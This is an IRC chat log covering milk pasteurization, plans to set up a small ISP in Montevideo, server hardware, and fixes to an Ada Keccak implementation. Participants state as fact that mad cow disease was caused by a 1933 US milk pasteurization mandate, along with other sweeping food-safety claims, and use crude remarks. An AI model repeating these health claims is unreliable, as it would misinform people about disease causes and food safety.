'incognito internet browser plugin' and other joys 1739952;1510878378;asciilifeform;culprit : http://www.motigo.com >> 'Create your own website statistics system with visitor counters for free!' etc. 1739953;1510882077;mircea_popescu;not just pdf, but a %20 plagued url like it's windows 95 all over again 1739954;1510882106;mircea_popescu;http://btcbase.org/log/2017-11-16#1739945 << dun be ridiculous, more expensive than living on boat. 1739955;1510882106;a111;Logged on 2017-11-16 22:45 asciilifeform: for some reason asciilifeform immediately pictured BingoBoingo living inside a 42u cabinet, diogenes-style 1739956;1510882137;mircea_popescu;http://btcbase.org/log/2017-11-16#1739946 << great way to make friends / polish language tho. i'd say mandatory entry point. 1739957;1510882137;a111;Logged on 2017-11-16 22:50 BingoBoingo: asciilifeform: Well, after whatever hotel comes with flight may be living in hostel dorm for first few months. 1739958;1510882219;mircea_popescu;else if(!("712837" in motigoCounterLoaded)) << lolled. 1739959;1510883614;asciilifeform;spoiler: it ~randomly infests some % of clicked links 1739960;1510883698;mircea_popescu;i believe the word is "monetizes". 1739961;1510888152;BingoBoingo;mircea_popescu: Well, I figure hotel that comes with ticket offers a bit of security when it's needed for things to get to rack. Hostel afterwards because moving to Montevideo during high tourist season (fucking Argentines) 1739962;1510888472;BingoBoingo;http://btcbase.org/log/2017-11-17#1739954 << Not so expensive given my power needs if I get internet connectivity elsewhere 1739963;1510888472;a111;Logged on 2017-11-17 01:28 mircea_popescu: http://btcbase.org/log/2017-11-16#1739945 << dun be ridiculous, more expensive than living on boat. 1739964;1510888651;mod6;finally ate l0g 1739965;1510888708;mircea_popescu;BingoBoingo hm ? 1739966;1510888726;BingoBoingo;mircea_popescu: If I was housing myself in the rack instead of boxes 1739967;1510888758;mircea_popescu;yeees ? 1739968;1510888974;*;BingoBoingo wonders what timeline is on more seekritive alf-isp 1739969;1510889064;BingoBoingo;Anyways collected plan for presence during formative period of TBI in Montevideo is live in hostel, fiscal address and coffee at coworking site, lots of walking 1739970;1510889287;mircea_popescu;sound like fun ? 1739971;1510889373;BingoBoingo;Very! 1739972;1510889485;*;BingoBoingo digesting "Pimsleur" to train write head around core of language since... usuage at the BingoBoingo store tends to focus on small subset. 1739973;1510890082;mircea_popescu;and in other trilema antiques, http://trilema.com/2012/in-re-hein-hettinga-et-al-v-usofa/#selection-35.0-39.623 1739974;1510890317;*;BingoBoingo blogging summary of present status 1739975;1510890811;asciilifeform;meanwhile asciilifeform learned that the http://btcbase.org/log/2017-10-24#1728402 slogan originated from herr ceaușescu 1739976;1510890811;a111;Logged on 2017-10-24 22:04 asciilifeform: and also the 'don't know history is like children who don't know their parent' thing 1739977;1510890838;mircea_popescu;not sure about origination, but sure, used. 1739978;1510890838;asciilifeform;( graffitiism found all over timis ) 1739979;1510891037;asciilifeform;http://btcbase.org/log/2017-11-17#1739973 << whole verdict is interesting read 1739980;1510891037;a111;Logged on 2017-11-17 03:41 mircea_popescu: and in other trilema antiques, http://trilema.com/2012/in-re-hein-hettinga-et-al-v-usofa/#selection-35.0-39.623 1739981;1510891047;mircea_popescu;aha 1739982;1510891060;mircea_popescu;textbook "we give up" by vhs-usa. 1739983;1510891069;asciilifeform;and on top of this recall that milk in usa tastes like shit. because pasteurized. 1739984;1510891078;asciilifeform;mandatorily, in all 50 states. 1739985;1510891095;mircea_popescu;mno. see, i had pasteurized milk, in romania. it was fine. different, but fine 1739986;1510891105;mircea_popescu;us milk is UHT'd. this is a different process from pasteurization. 1739987;1510891117;asciilifeform;i had both in most recent voyage, could definitely tell the diff b/w joiana and conventional 1739988;1510891136;mircea_popescu;yes, because by usg mandate romania moved from pasteurization to uht-ization 1739989;1510891138;asciilifeform;but yes, both ahead of ultra-premium in usa 1739990;1510891173;asciilifeform;the only way to get joiana-type in usa is to actually own a cow 1739991;1510891178;mircea_popescu;uht being "ultra-pasteurization" in the sense sysco is ultra-restaurantization 1739992;1510891219;mircea_popescu;(chief difference being that heating milk to 135 degrees for a couppa minutes maillards most of the long fats ; whereas classical process, half that temperature, did not nor could not) 1739993;1510891266;mircea_popescu;(the difference is that 135/1s milk is shelf-stable for up to a year, whereas traditional 72degree/15s milk is shelf stable for maybe two weeks) 1739994;1510891267;asciilifeform;btw there exists a next step after this, and the typical 'flyover state' denizen already eats it : powder 1739995;1510891316;asciilifeform;i expect it will be mandatory at some point. that, or soy 'milk'. 1739996;1510891334;mircea_popescu;anyway. the lower temp thing is 1933 standard, related to the hettinga thing. the process is designed to kill a pathogen that... you don't have to have, and well kept cows don't have. 1739997;1510891335;asciilifeform;( cows! consider, so ecologically ungodly, or whatever ) 1739998;1510891345;mircea_popescu;it allowed the move away from farmed cows into the abominable us-style groweries 1739999;1510891359;mircea_popescu;so it is evidently counter-productive, not that anyone ever bothered to point this out. 1740000;1510891410;asciilifeform;'hatefact' 1740001;1510891412;mircea_popescu;ie, nobody will ever say "mad cow disease exists because usda introduced mandatory milk pasteurization in 1933 taking advantage of the 'overproduction' of milk the usg generated artificially through fucking the currency" 1740002;1510891443;mircea_popescu;notwithstanding that this is entirely factual, humans INVENTED a new, lethal disease for bos primigenus, BECAUSE retarded usg regulation has the unwelcome effect of responsibility divestment. 1740003;1510891507;mircea_popescu;so you know, usg wants to talk about how "companies don't correctly account for their externalities and global warming", provided of course we don't talk about how usg doesn't correctly account for ITS externalities and kreutzfeld-jakobs. 1740004;1510891520;mircea_popescu;moar of the http://btcbase.org/log/2017-11-16#1739813 1740005;1510891520;a111;Logged on 2017-11-16 18:35 ben_vulpes: but it couldn't happen, pantsuit tools clearly can only ever be used by them against their enemies 1740006;1510891524;asciilifeform;bonus is that pasteurization ( and for that matter anything short of incineration ) does 0 against prion. if it were excreted in milk , usa would be depopulated crater long ago 1740007;1510891577;mircea_popescu;i lost oxtail soup to these imbeciles, and i will take a pound of flesh and nothing else to make it right. 1740008;1510891714;*;asciilifeform wonders if gamma sterilization of meat is mandatory yet in usa 1740009;1510891738;mircea_popescu;it miught be, considering how terrible usda approved meat is these days. 1740010;1510891748;asciilifeform;was introduced for same reason as milk pasteurization 1740011;1510891791;asciilifeform;' Electron-beam treated ground beef and poultry probably will be in supermarkets by late spring 2000' << from http://animalscience.psu.edu/extension/meat/pdf/IrradFctSheet.pdf , full lully at http://wotpaste.cascadianhacker.com/pastes/i1qmA/?raw=true 1740012;1510891870;mircea_popescu;in fairness not much different from showing the meat a lot of daytime tv. 1740013;1510891924;asciilifeform;!#s deinococcus 1740014;1510891925;a111;2 results for "deinococcus", http://btcbase.org/log-search?q=deinococcus 1740015;1510891935;asciilifeform;^ see also. 1740016;1510891938;mircea_popescu;whoa, THAT is in the logs ? 1740017;1510891946;asciilifeform;sure is. 1740018;1510891975;mircea_popescu;i r impresst. 1740019;1510892063;asciilifeform;as for 'daytime tv', whacking object with high energy particle ( photon or electron, for this case dun matter ) gives free radical. 1740020;1510892090;mircea_popescu;but "scientists have reviewed studies", plus denmark, plus the food does not become radioactive. SO ITS OK! 1740021;1510892105;asciilifeform;( as well as random breakdown strange, a la miller urey tube ) 1740022;1510892112;mircea_popescu;"running windows does not make the monitor punch me in the face, scientists have found. therefore windows legit os." 1740023;1510892129;asciilifeform;not radioactive, no ( until some joker introduces... neutron sterilization, lol ) 1740024;1510892163;asciilifeform;oh also pretty great for revving up mutation in the surviving microbes 1740025;1510892189;mircea_popescu;there is that. 1740026;1510892205;asciilifeform;( process where various microbes were bred for biowar in su, was not wholly dissimilar from the meat sterilizer... ) 1740027;1510892213;mircea_popescu;exactly the process of above, "make regulation to feel important about self in 1933, get new, wholly human made disease by 1973". 1740028;1510892246;mircea_popescu;by 2040 we'll have "nobody could have predicted" and "usg tards still respectable / government still needed / state still important BECAUSE ALTERNATIVES UNTHINKABLE!!1" as per usual. 1740029;1510892287;asciilifeform;'Moar Needed Than Ever, Now That We Have Fuckwitz-Brainmelt Disease' 1740030;1510892313;mircea_popescu;right. 1740031;1510892323;mircea_popescu;"and who created that ?" "dunno." 1740032;1510892339;mircea_popescu;"it's not the direct result of having a congress ?" 1740033;1510893059;deedbot;http://www.thedrinkingrecord.com/2017/11/16/tbi-mid-november-update/ << Bingo Blog - TBI Mid November Update 1740034;1510893080;BingoBoingo;^ Summary of what thing is thus far, comment and especially criticism welcome. 1740035;1510893098;asciilifeform;oh hey hey hey lbj 1740036;1510893149;asciilifeform;BingoBoingo: notbad. other than the 100M ethernet per rack thing 1740037;1510893287;BingoBoingo;asciilifeform: More can be added to rack. Adding connection as symmetrical dedicated is Mucho Dinero. Adding connecection as asymmetrical is less. 1740038;1510893440;BingoBoingo;And irony of ironies, alf and Bingo flip on bandwidth 1740039;1510893685;BingoBoingo;Conversation did begin as they all did with 10 to 20 Gbps ask, moved to expected sustained transfer + headroom 1740040;1510894193;asciilifeform;BingoBoingo: i see 100M per-box as reasonable low end 1740041;1510894219;asciilifeform;that's wat, 4g per cabinet. 1740042;1510894319;BingoBoingo;100 Mbps, guaranteed International speed is 3000 USd and change 1740043;1510894390;BingoBoingo;In Uruguay and in HK. 1740044;1510894425;asciilifeform;sounds like massive gouge 1740045;1510894523;asciilifeform;i can picture the backroom convo, 'hey how many zeros can we glue to the gringo's price' 1740046;1510894702;BingoBoingo;Hong Kong happy to offer 10 Gbps at that price... for traffic within Hong Kong (rest of PRC, International, 50 Mbps, 100 Mbps still moar) 1740047;1510894782;mircea_popescu;lel tehboingo, isp. 1740048;1510894783;mircea_popescu;notbad 1740049;1510894788;BingoBoingo;tyvm 1740050;1510894853;mircea_popescu;BingoBoingo breakdown of that 19k is the paramount consideratyion here. be detailed. 1740051;1510895328;BingoBoingo;I am glad to offer: 6283 (or 5150, unclear yet if VAT'd) off the shelf SA corp including lawyer, notary, and accountant fees, 1500 to set up the rack, 600 to LACNIC as a nano size ISP for IP allotment, 5335 for first month's rack rent, 341 for fiscal address and space with lock 24/7 access to coffee pot, 1200 budgeted to switch and router (actual likely closer to half that), 3200 putting Bingo in Montevideo (actual likely less budgeting 1740052;1510895328;BingoBoingo;worse case). Pls to let me know if sane, other expenses to expect, or if more fat to cut. 1740053;1510895407;BingoBoingo;Also 541 USd padding for surprises 1740054;1510895409;mircea_popescu;jesus that's an expensive corp. 60x what rando us agent charges for a scorp ? 1740055;1510895426;mircea_popescu;don't mix reserves and costs, it confuses thinking. 1740056;1510895462;mircea_popescu;3200 putting Bingo in Montevideo being what, plane ticket + what exactly ? 1740057;1510895467;BingoBoingo;The goverment's fees for an SA are ~1500 1740058;1510895487;asciilifeform;BingoBoingo: is that a yr's worth of accountant ? 1740059;1510895494;asciilifeform;or month, or wat 1740060;1510895495;BingoBoingo;Plane + hotel bundle eyeballed off of expedia 1740061;1510895526;mircea_popescu;don't bundle. 1740062;1510895528;BingoBoingo;asciilifeform: Transaction's worth. 1740063;1510895587;mircea_popescu;iirc my argentine corp cost me about $700 or so to set up, though i was being generous with teh locals. 1740064;1510895621;mircea_popescu;BingoBoingo is this google produced gringo scalper ? or local anything ? 1740065;1510895662;BingoBoingo;mircea_popescu: Gringo attorney in Montevideo. 1740066;1510895691;BingoBoingo;Searching for cheaper off the shelf corps, but none yet found 1740067;1510895693;mircea_popescu;it's utterly not worth paying 6k for this as it is. 1740068;1510895756;mircea_popescu;BingoBoingo at this point i'd rather give up trying to find non-tards online, go to lawyer in uruguay have it set up there. you can internetr just as well from uruguay as from illinois or what was it. 1740069;1510895808;mircea_popescu;when were you leaving, early dec was it ? 1740070;1510895825;BingoBoingo;Aiming to leave between December 1st and December 4th 1740071;1510895885;mircea_popescu;aite, so you land in uruguay, find yourself student girlie helper + reasonable place to dorm in, then find lawyer get corp sorted out. 1740072;1510895896;mircea_popescu;dja get the tickets reserved/paid/what is it ? 1740073;1510895915;BingoBoingo;Not reserved yet. This is the sanity checking before reserving things. 1740074;1510895928;mircea_popescu;go ahead. how much are you getting charged ? 1740075;1510896078;mircea_popescu;copa services ORD-MVD at ~1.3k fwis. not even bad. you getting that ? 1740076;1510896217;BingoBoingo;I am seeing 1150-1250 1740077;1510896258;mircea_popescu;plus fees. aite, so go for it. change teh patrimonial bitcoin to have cash if you need. or do you have spare cash ? 1740078;1510896277;mircea_popescu;!~ticker --market all 1740079;1510896282;jhvh1;mircea_popescu: Bitstamp BTCUSD last: 7833.56, vol: 21452.45181747 | Bitfinex BTCUSD last: 7849.7, vol: 96288.38088123 | Kraken BTCUSD last: 7849.2, vol: 8511.81098169 | Volume-weighted last average: 7846.92383257 1740080;1510896299;mircea_popescu;not even terrible. 1740081;1510896299;BingoBoingo;cash reserves are low while in US 1740082;1510896328;mircea_popescu;BingoBoingo trade teh bitcoin out then, buy your ticket, go there with a gangsta roll. 1740083;1510896337;BingoBoingo;k 1740084;1510896343;mircea_popescu;did you check local bitcoins and whatnot to see how your cashflow promises to be there ? 1740085;1510896359;mircea_popescu;montevideo + buenos aires (it's a few hours by boat/bus away sorta deal) 1740086;1510896386;BingoBoingo;Looks like international wire mostly 1740087;1510896434;*;BingoBoingo needs to check localbitcoins moar 1740088;1510896435;mircea_popescu;look moar insistently lol, network that moved millions back when we were unseating the whore face couldn't have evaporated in less than a year eh. 1740089;1510896607;*;BingoBoingo will also move on coworking space/fiscal address 1740090;1510896643;mircea_popescu;cool. build your network mostly, gotta know useful locals. don't waste your time with the losers more than it takes to discover loseracy. 1740091;1510896704;*;BingoBoingo plans to start the networking with AA meetings, leverage that seekrit society 1740092;1510896733;mircea_popescu;whatsoever works. coworker space, hostel, talk to the whores, talk to the students, as long as you talk to people... 1740093;1510896837;mircea_popescu;just don't do stupid shit like puting up in hotels / eating at restaurants etc. follow teh backpacker crowd around, it's where teh hustle begins. 1740094;1510896890;BingoBoingo;AHA, hotel is pretty much the same wherever you hotel. 1740095;1510897014;mircea_popescu;we get to find out how nimble bb is on his feet! 1740096;1510897044;BingoBoingo;That we will. Maybe I even fall! 1740097;1510897057;BingoBoingo;Into pretty Brazilian vacation girls 1740098;1510897062;mircea_popescu;lol 1740099;1510897095;mircea_popescu;a yeah, pack a camera, you'll get to give my travel posts a run for their money eh. 1740100;1510897142;BingoBoingo;A camera is has 1740101;1510897462;*;BingoBoingo to put "2 week notice" @ BingoBoingo Store on tomorrow's do list 1740102;1510897485;ben_vulpes;wd 1740103;1510897490;ben_vulpes;BingoBoingo: i'm in for 2 1740104;1510897594;ben_vulpes;but bbl, off to do some social soldering 1740105;1510897668;ben_vulpes;http://btcbase.org/log/2017-11-08#1734752 << forgot to mention: unholy piles of sql too 1740106;1510897668;a111;Logged on 2017-11-08 23:54 ben_vulpes: cl and legacy pyshits mostly 1740107;1510897824;BingoBoingo;ben_vulpes: ty 1740108;1510897860;trinque;BingoBoingo: idea is we'll ship servers to you once there? 1740109;1510897891;BingoBoingo;trinque: That's the pricing I have figured out so far. 1740110;1510898224;trinque;how many IPs per 1U? 1740111;1510898268;trinque;relevant to carving up a U into VPSen for folks like lobbes 1740112;1510898383;BingoBoingo;trinque: To be determined. Datacenter wants me to get IPs through LACNIC, will assist in the application process, but not guaranteeing anything 1740113;1510898882;mircea_popescu;may take some finagleing, usg.dns decided to be a bitch about ips so as to force ipv6 uptake. 1740114;1510898903;mircea_popescu;that it meanwhile entirely failed isn't gonna percolate to orc bureaucrat heads within the remaining lifetime of teh empire. 1740115;1510898955;mircea_popescu;trinque better idea is that we have to figure out what boards/etc we're buying. a "standard box of the republic". 1740116;1510898971;*;mircea_popescu looked at various would-be standards (earlier "libre" lulz related to this), none are worth two shits. 1740117;1510899010;mircea_popescu;a v-root for proper box software (bios, grub, etc) very much in order also, twinned with box standard. 1740118;1510899239;trinque;yep, I will have to do some research there myself. 1740119;1510899310;*;trinque stopped in anger, resolved to use g4 and g5 PPCs in personal infrastructure 1740120;1510900477;BingoBoingo; trinque better idea is that we have to figure out what boards/etc we're buying. a "standard box of the republic". << AHA, this is why cost of dedi box hosting not yet spec'd 1740121;1510900539;BingoBoingo;Basic box prototype did arrive today. Has been assembled, but not really played with. Likely not too impressive for tasks requiring lots of horsepower. 1740122;1510900620;BingoBoingo;Pero tiene cuatro nucleos y dieciseis GB RAM, so requires playing with 1740123;1510900668;trinque;for the simple webhosting and bothosting cases, of which there oughta be many, max-spec'd machine is not necessary 1740124;1510900780;BingoBoingo;Hence this is the stab at a basic box. Board widely available, has serial header, but only one ethernet port so not useful as router 1740125;1510901014;BingoBoingo;For webhosting though, one has to remember that hosting typically means MP-WP which can tax a database if the traffic is there 1740126;1510901147;trinque;most sensible databases amount to ramdisk stores on a db that size 1740127;1510901303;BingoBoingo;Still, calls to it add up 1740128;1510901489;BingoBoingo; may take some finagleing, usg.dns decided to be a bitch about ips so as to force ipv6 uptake. << Either way LACNIC is cheaper/(less competition for space) than APNIC 1740129;1510918687;BingoBoingo;!~ticker --market all 1740130;1510918698;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7826.02, vol: 21892.21531492 | Bitfinex BTCUSD last: 7814.7, vol: 102720.97707639 | Kraken BTCUSD last: 7827.0, vol: 7404.02021221 | Volume-weighted last average: 7817.26700864 1740131;1510927598;asciilifeform;http://btcbase.org/log/2017-11-17#1740117 << you can't v-root an item containing binturds. and the only x86 bios without winturds, is for opteron or ancient (pre-2008) intels. with recent chips even binturd-containing coreboot dun work, and yer stuck with the heathen fw shipped in the box. 1740132;1510927598;a111;Logged on 2017-11-17 06:10 mircea_popescu: a v-root for proper box software (bios, grub, etc) very much in order also, twinned with box standard. 1740133;1510927769;asciilifeform;http://btcbase.org/log/2017-11-17#1740119 << similar here, with opterons. but they have the drawbacks already discussed. ( power hungry, run hot, not obtainable in arbitrary qty given as no longer made ) 1740134;1510927769;a111;Logged on 2017-11-17 06:15 trinque stopped in anger, resolved to use g4 and g5 PPCs in personal infrastructure 1740135;1510928024;*;asciilifeform genuinely does not know of anything worth calling 'standard box of the republic' 1740136;1510928188;asciilifeform;!~later tell trinque ever found a rack mount multicore g5? 1740137;1510928188;jhvh1;asciilifeform: The operation succeeded. 1740138;1510928235;asciilifeform;( g4, with its 4GB address space, i do not regard as very interesting ) 1740139;1510928449;asciilifeform;back to coreboot, fwiw i have a working build for 'pcengines' 1740140;1510928519;asciilifeform;enough room in the eeprom for a kernel as payload, even. 1740141;1510929065;diana_coman;PeterL and anyone else following along on keccak: 2 more problems found so far in the ada code namely 1. in the pi permutation it's the *output* coordinates that are calculated as Y, 2*X+3*Y based on input at X,Y and not the other way around; 2. at iota the corresponding round constant is xored into a(0,0) only, not into all the lanes of the state (following permutations will propagate the round constant) 1740142;1510931504;asciilifeform;in other lulz, https://archive.is/p1RZm >> 'Chinese drone maker DJI left the private key for its dot-com's HTTPS certificate exposed on GitHub for up to four years' 1740143;1510933610;trinque;asciilifeform: beefiest xserve was a dual proc 2.3ghz, tapped out at 16gb ram 1740144;1510933812;asciilifeform;trinque: sounds respectable. are they obtainable ? 1740145;1510934737;trinque;dwindling but I still find them in the usual places for scrap 1740146;1510934744;trinque;opteron's a safer bet 1740147;1510937698;asciilifeform;it had similar problems, iirc, to opteron -- ran hot 1740148;1510937790;asciilifeform;i'd quite like to have some bigendian heavy iron for 'biodiversidad'/specificity-of-diddling reason, but afaik there is none to be had ( at least in the weight class of opteron, which can haz in 32cores easily enough ) 1740149;1510944470;asciilifeform;!!up Ingolfr_Arnarson 1740150;1510944470;deedbot;Ingolfr_Arnarson voiced for 30 minutes. 1740151;1510944512;Ingolfr_Arnarson;Thanks 1740152;1510944535;asciilifeform;who might you be, Ingolfr_Arnarson ? 1740153;1510944621;Ingolfr_Arnarson;I was trying to find information on gossipd, followed the 'how to participate in the affairst of the republic' link on the channel automatic text you get when you enter and reached the gossipd design document. 1740154;1510944663;asciilifeform;Ingolfr_Arnarson: anything in particular ? 1740155;1510944683;Ingolfr_Arnarson;any recommendable log to read with more detail on the advance of the project? 1740156;1510944724;Ingolfr_Arnarson;I am just curious because I mentioned the idea of getting rid of dns and someone who actually reads the logs sent me a link to the article about draining the DNS Swamp. 1740157;1510944740;asciilifeform;Ingolfr_Arnarson: it isn't a complicated item, but does demand a sane rsatron 1740158;1510944744;Ingolfr_Arnarson;And mentioned gossipd was the name of the actual thing. 1740159;1510944748;asciilifeform;which is currently in the works, 1740160;1510944750;asciilifeform;!#s ffa 1740161;1510944751;a111;336 results for "ffa", http://btcbase.org/log-search?q=ffa 1740162;1510944791;asciilifeform;( all implementations of rsa in common use, are unsuitable for real time programs, on account of leaking private key via timing side channel ) 1740163;1510944987;Ingolfr_Arnarson;That's good info to research for. 1740164;1510945019;Ingolfr_Arnarson;thx for the logs 1740165;1510945116;Ingolfr_Arnarson;!!rate 1740166;1510945185;Ingolfr_Arnarson;!!rate asciilifeform 1 Helped me providing info and logs on gossip. 1740167;1510945187;deedbot;Get your OTP: http://p.bvulpes.com/pastes/AgqER/?raw=true 1740168;1510945303;asciilifeform;!#s from:mircea_popescu gossipd 1740169;1510945303;a111;222 results for "from:mircea_popescu gossipd", http://btcbase.org/log-search?q=from%3Amircea_popescu%20gossipd 1740170;1510945307;asciilifeform;^ see also. 1740171;1510948058;ben_vulpes;use more null-cipher cryptosuites: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/ 1740172;1510948178;ben_vulpes;hmac blunder also epic 1740173;1510948922;asciilifeform;in other noose, https://archive.is/NI40u >> 'US Navy: Penis in sky drawn by jet trail was 'unacceptable'' 1740174;1510948926;BingoBoingo;In other news, there was much rejoicing at the BingoBoingo store today as rumors concerning my resignation notice circulated. 1740175;1510948989;asciilifeform;oh hey congrats BingoBoingo 1740176;1510949145;BingoBoingo;Departures from there, particularly to greener pastures tend to inspire much hope. I don't expect many of my fellows there wake up to a battleship in their coffee though. 1740177;1510949282;BingoBoingo;Also lead time from application to LACNIC IP address assignment is ~2 weeks 1740178;1510949350;ben_vulpes;lol argentina had a submarine?! https://www.nytimes.com/2017/11/17/world/americas/argentina-submarine-missing.html 1740179;1510949431;BingoBoingo;ben_vulpes: You mean the City State of Buenos Aires + Cows 1740180;1510949613;ben_vulpes;pantsuit self-purge of thought criminals continues: http://www.miamiherald.com/news/politics-government/state-politics/article185207928.html 1740181;1510950131;BingoBoingo;usg.red taunts usg.blue https://archive.is/Gd5DX 1740182;1510950389;ben_vulpes;"it's a penis!" 1740183;1510950419;ben_vulpes;in other well-trained children, $child just attempted to put himself down for a nap in the comfy chair in my office 1740184;1510951109;BingoBoingo;Awe 1740185;1510951167;BingoBoingo;""It's a penis." That's the explanation! The kids will be able to handle it." << Then why all the fuss when adult women get shown penii! 1740186;1510951225;ben_vulpes;anti-flirt brigade doing what it does 1740187;1510951489;asciilifeform;in other butthurts, https://archive.is/nw25r >> 'For M.I.T. students, this waiver keeps us from having to pay a bill of about $50,000 every year — a staggering amount, but one that is similar to the fees at many other colleges and universities. ... But under the House’s tax bill, our waivers will be taxed. This means that M.I.T. graduate students would be responsible for paying taxes on a $80,000 annual salary, when we actually e 1740188;1510951490;asciilifeform;arn $33,000 a year.' 1740189;1510951556;asciilifeform;somehow it is a-ok for folx who win a toyota in a lottery to go broke, from sudden tax owed. but ohnoez, try an' tax pantsuit 'leading tech institution' dim bulb folx... 1740190;1510951625;ben_vulpes;the refusal to accept that they're just playing a different lotto is so tasty 1740191;1510951986;asciilifeform;ianal but there's a genuine eggog in there -- either that 50k is ~income~ for the chump^H^H^Hstudent; or it ain't, and it then also is not expenditure ( i.e. something to be written off taxables ) for mit 1740192;1510952077;asciilifeform;not that usd is required to obey conservation of mass, but possibly mit is about to be struck off the list of folx having the crown privilege to make it appear and disappear on command in this way. 1740193;1510952232;ben_vulpes;asciilifeform: i don't see anyone contesting that it's not income 1740194;1510952264;asciilifeform;well apparently threatens to become ordinary, rather than magically tax-exempt For Reasons, income 1740195;1510952286;ben_vulpes;to take the other side for half a second, who says that i can't charge whomever i want whatever i want for services? 1740196;1510952318;asciilifeform;ben_vulpes: didja read the milk thing on trilema ? 1740197;1510952344;ben_vulpes;yes, but apparently it did not hit? 1740198;1510952359;asciilifeform;well answr to the 'who sez' is 'usg gosplan sez' 1740199;1510952367;ben_vulpes;mm mhm 1740200;1510952392;ben_vulpes;unrelolted: http://www.fox2detroit.com/news/local-news/detroit-police-officers-fight-each-other-in-undercover-op-gone-wrong 1740201;1510952516;asciilifeform;ben_vulpes: see also http://btcbase.org/log/2016-07-17#1504301 1740202;1510952516;a111;Logged on 2016-07-17 19:58 asciilifeform: 'Mr Vancel said the men were shooting at each other before the officers arrived. "This was not a 'come at police' situation they weren't targeting the police at first - I don't assume so - because these were men out here shooting at each other in an empty parking lot until the police showed up and it turned into a gun battle," he added.' << lel 1740203;1510952548;asciilifeform;( iirc later was found that ~only~ police had been present at this particular shootout ) 1740204;1510952779;asciilifeform;ben_vulpes: re 'other side', recall that usa a bestkorea where ~everything~ is, at least on paper, taxable -- e.g. if i work for a butcher and he pays me in the form of letting me buy 10 chickens a month for a 1 $ instead of 50 $ ea., this is considered taxable just the same as if he paid in buxxorz 1740205;1510952805;asciilifeform;and the income is tallies as the market value ( per usg gosplan ) of the difference, 49bux/ea 1740206;1510952826;asciilifeform;or whatever the inspectors decide they were worth, when they raid 1740207;1510952828;ben_vulpes;i absolutely understand this, asciilifeform . 1740208;1510952868;asciilifeform;so wai not dekulakize the mit derps for 'tax on 80k'. 1740209;1510952909;ben_vulpes;i'm not saying don't, i'm just being wistful about an america i never knew! 1740210;1510952947;asciilifeform;lol 1740211;1510952972;ben_vulpes;le wik maintains that baton rouge event did have a cophunter in attendance 1740212;1510952985;*;asciilifeform has nfi 1740213;1510953005;asciilifeform;possibly it, as usually the case, lies; possibly asciilifeform was thinking of another funfest elsewhere 1740214;1510953107;ben_vulpes;asciilifeform: what does (others => 0) mean in an assignation statement in p? 1740215;1510953160;asciilifeform;ben_vulpes: it's a standard ada operator that sets an array to 0. 1740216;1510953183;asciilifeform;( or to another repeating constant value . ) 1740217;1510953213;asciilifeform;see also http://www.adaic.org/resources/add_content/docs/craft/html/ch06.htm 1740218;1510953242;asciilifeform;( can go straight to example, Details := (1..10 => 'x', 11..13 | 21..23 | 27 | 29 => 'y', others => ' '); ) 1740219;1510953258;asciilifeform;when there are no other elements referenced, it applies to the entire array. 1740220;1510953321;asciilifeform;see also the pertinent ARM , 4.3.3 'array aggregates', https://www2.adacore.com/gap-static/GNAT_Book/html/aarm/AA-4-3-3.html#I2421 . 1740221;1510953349;asciilifeform;( scroll straight to 'examples' if impatient. ) 1740222;1510953484;*;asciilifeform brb,meat 1740223;1510956701;ben_vulpes;asciilifeform: thank you 1740224;1510956739;ben_vulpes;in other wonderful old technology that is not made and barely findable any more, i cannot praise the sanford "logo ii" highly enough. the original "logo" is all right, but interestingly not quite as well made as its successor. 1740225;1510957034;asciilifeform;ben_vulpes: wassat? 1740226;1510957175;ben_vulpes;mechanical pencil 1740227;1510957191;ben_vulpes;i did the entire ME curriculum with the one on my desk, finally decided to get some backups. 1740228;1510957209;ben_vulpes;has a very long barrel for leads, which is great for heavy writers or people who like hard leads like myself 1740229;1510957244;ben_vulpes;one of the few mechanical pencils to not suffer from the retarded lead advancement while using eraser design flaw 1740230;1510958462;asciilifeform;aaaand guess what didn't take long : http://wotpaste.cascadianhacker.com/pastes/BOZaX/?raw=true << shits block archive.is 1740231;1510958560;ben_vulpes;dat nasty rag 1740232;1510959972;asciilifeform;in other noose, http://romdict.sourceforge.net/index.eng.php << the sad sad state of the art of opensores ro dictionaries 1740233;1510960002;asciilifeform;^ ~1000 words ! 1740234;1510960054;asciilifeform;http://www.free-soft.ro/everest/everest.html has nominally ~200k but is malwareware and enciphered db ( i dun currently have time to break the delphiturd and extract the key, sadly ) 1740235;1510963013;lobbes;update on archive-o-tron: Looks like leveraging archive.is is getting nowhere fast; according to the archive.is d00d 'download .zip is actually broken' 1740236;1510963025;lobbes;http://p.bvulpes.com/pastes/sj0Eq/?raw=true 1740237;1510963056;lobbes;I'm changing gears to creating my own archiver. Thinking of perhaps just using wget for the time-being 1740238;1510963071;lobbes;more updates to come 1740239;1510963161;asciilifeform;lobbes: wget will fail on ~all major enemy www ( noose sites etc ) on account of the dynamic loading idiocy 1740240;1510963198;lobbes;damn 1740241;1510963246;ben_vulpes;lobbes: try chromium or firefox in headless mode 1740242;1510963401;lobbes;ben_vulpes, ah okay! I hadn't thought about those browsers. I was trying to script something in lynx. Problem there was intermittent 503 errors. 1740243;1510963451;lobbes;(errors trying to download via archive.is, that is) 1740244;1510963603;BingoBoingo;In still coaster lollers: "Thiel's departure from Y Combinator was not previously announced. It comes long after Y Combinator president Sam Altman defended Thiel's role at the accelerator, following criticism of Thiel's support of then-presidential candidate Donald Trump. A source close to Y Combinator said that the company ended its part-time partners program, which Thiel was a part of, some time last year. While some other part-time 1740245;1510963604;BingoBoingo;partners moved over to a program called "experts," which provides advice to Y Combinator entrepreneurs, Thiel did not join." 1740246;1510964348;shinohai;http://archive.is/07Oas <<< I guess no use going thru the trouble of shutting down the sybil nodes or w/e 1740247;1510964858;ben_vulpes;somehow i missed that alibaba is in the timesharing business 1740248;1510966419;shinohai;From same roll of TP: http://archive.is/MGNht 1740249;1510966433;shinohai;reddit would sell it out within minutes. 1740250;1510967246;BingoBoingo;And the winner to provide my ticket was... COPA 1740251;1510967285;asciilifeform;BingoBoingo: i used it when i went to c3. be prepared for lotsa gate-changes/reschedules/misc crapola 1740252;1510967313;shinohai;Vas necesitar una "copa" despues! xD 1740253;1510967351;BingoBoingo;shinohai: Solo una copa de feel 1740254;1510967371;shinohai;hue 1740255;1510967401;BingoBoingo;asciilifeform: Both transfers have substantial time padding them. 1740256;1510967444;asciilifeform;lemme guess, panama then bolivia ? 1740257;1510967474;BingoBoingo;RoT, Panama, Uruguay 1740258;1510967487;asciilifeform;aa 1740259;1510967506;BingoBoingo;(RoT being trinque's Republic of Texas) 